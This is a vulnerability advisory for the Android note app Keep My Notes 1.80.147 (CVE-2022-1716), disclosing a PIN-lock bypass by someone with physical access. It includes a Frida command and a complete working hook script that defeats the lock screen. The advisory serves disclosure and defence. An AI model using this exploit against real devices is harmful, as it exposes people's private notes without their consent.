Keep My Notes 1.80.147 - Improper Access Control

Summary

NameKeep My Notes 1.80.147 - Improper Access Control
Code nameTyler
ProductKeep My Notes
Affected versionsVersion 1.80.147
StatePublic
Release date2022-06-01

Vulnerability

KindImproper Access Control
Rule115. Security controls bypass or absence
RemoteNo
CVSSv3 VectorCVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CVSSv3 Base Score6.1
Exploit availableYes
CVE ID(s)CVE-2022-1716

Description

An attacker with physical access to the victim's device can bypass the application's password/pin lock to access user data. This is possible due to lack of adequate security controls to prevent dynamic code manipulation.

Proof of Concept

It is important to know that for a successful exploitation, the "Continue" button must be clicked repeatedly.

https://user-images.githubusercontent.com/51862990/168275718-5f8e230f-54f1-4c7c-8393-c58f0dcfda2b.mp4

Steps to reproduce

  1. Install and configure frida as indicated in the following link.

  2. Now just run this command to hook the run function so that it can be dynamically rewritten to bypass application protection.

    frida -U 'Keep My Notes' -l exploit.js
    
  3. Now all you have to do is click the "Continue" button 3 or 4 times, then close the application and finally open it again.

System Information

  • Package Name: org.whiteglow.keepmynotes
  • Application Label: Keep My Notes
  • Mobile app version: 1.80.147
  • OS: Android 8.0 (API 26)

Exploit

// exploit.js
Java.perform(() => {
    console.log("[+] Hooking LookScreenActivity - Class f - Method run");
    const LockScreenActivity = Java.use("org.whiteglow.keepmynotes.activity.LockScreenActivity");
    const f = Java.use("org.whiteglow.keepmynotes.activity.LockScreenActivity$f");
    f.run.implementation = () => {
        console.log("Bypass Lock Screen");
        LockScreenActivity.$new().d();
    }
})

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from the Offensive Team of Fluid Attacks.

References

Vendor page http://www.kitetech.co/keepmynotes

Timeline

Time-lapse-logo

2022-05-12

Vulnerability discovered.

Time-lapse-logo

2022-05-12

Vendor contacted.

Time-lapse-logo

2022-05-12

Vendor Confirmed the vulnerability.

Time-lapse-logo

2022-06-01

Public Disclosure.